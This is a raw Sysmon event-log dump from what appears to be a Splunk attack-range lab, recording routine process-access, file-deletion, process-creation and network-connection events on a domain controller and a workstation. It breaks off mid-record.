11:03:19.921{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.921{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.921{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.921{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.552{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DE55A35E689C1484963FD371E5B5D07,SHA256=5BA9F5809AB0C3A8895B502D5B6714DC2D80F71E258E928ABE4FEAFDB2290B78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:21.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BCB46A867C599E68BDBEA37A699F335,SHA256=B910BFB81BB89E4630A7ADC82C393662F69C9B4C7D4DED4ABCEC6142922D3694,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.192{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1479-6216-A206-000000003802}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.192{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.192{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.192{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.192{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.192{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1479-6216-A206-000000003802}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.192{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1479-6216-A206-000000003802}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.193{C8EA50B7-1479-6216-A206-000000003802}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:22.552{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A280F38178C6F802B5C64FDE88D404,SHA256=26AA9D4F54BF618ACCCFF41D5BAE85B392C4A5AA4230E1F118D2C7376331D218,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:22.332{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0B5AF28BE9D0C67115A888858115C4E,SHA256=B6865F6FD658EB3E8460703499000CA96A51CEBC0D4CCFACF4E8197291EAE0C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:19.082{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx63422-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000218894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:18.686{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51488-false10.0.1.12-8000- 23542300x8000000000000000218893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:22.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA7C5AC8E27397AB0BE8948F33FF570A,SHA256=201E1217CB860A2EC2EA8B383D8D2B68B28FA5DD7D22716FC8B2D56F8F42266A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:23.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3FA7F532C73E86420A64C75A5BBB06B,SHA256=1665382EAA0500DDD123543BE3C89895B9214836FD6DBE93667BB16C9E778D1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:23.583{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=646263ABED15060A090F079D16FEABAA,SHA256=6068C4D0FF715D225D95CB8AA4304291D4EBE56B1C3E7F216F24C72D66D1974F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:24.599{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=036388CC916EFF1072C83BCA5D2220B8,SHA256=18EA28C595E233D6477DE66BEAB34084B9A23ACD404CC5EE787BB5E728E6FB59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:24.472{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03525B7451F2CC26263DA19BACF2965F,SHA256=7958ED9B8B883DCD317B9ADCC6DD82DB7334D42CDD15D1203746061DF694D92C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:22.105{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx62186-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000294700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:24.468{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000294699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:21.625{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49163-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000294705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:25.968{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000294704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:25.968{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:25.968{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF8a4af4.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:25.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C34890AC4AA3FD1C4A0B28ECF8419BCB,SHA256=F95161B0FAA547CFA5E962417A4141B59291959EAE143712E0EBEBBDC27BBCB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:25.488{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71244C9EAFBD880FF2A2C5E6A0462FCC,SHA256=DB094957FA00E4AEE0E13AED7BF403483814E24EF05D91B656B99DDD85373D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:25.207{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B2A061636E6B1C81315AE99F7086682,SHA256=6440D5DDCA69B03BFCDE5723DC8D278E00CB451ED494A571C7C255893F3ABCB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:26.931{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:26.615{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E302F9875F8C25608B0C48705D8198CC,SHA256=97687CAF59740F87497D6DBB2EA100033486AAC0B064073ACD96126475B33F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:26.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=514AC674FFA6F346203D5F8C8DBBF558,SHA256=D1D128FE93AA2B6C668D20E235190045C128E07B2F071D1813E24D720479936B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:24.467{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51489-false10.0.1.12-8000- 23542300x8000000000000000294708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:27.615{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82DDD1D246F1BA7161D86D70A1620356,SHA256=19C82A877465D58950748E87CB091A44FDABBC77F82FDA8612880B2B386A483D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:27.722{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 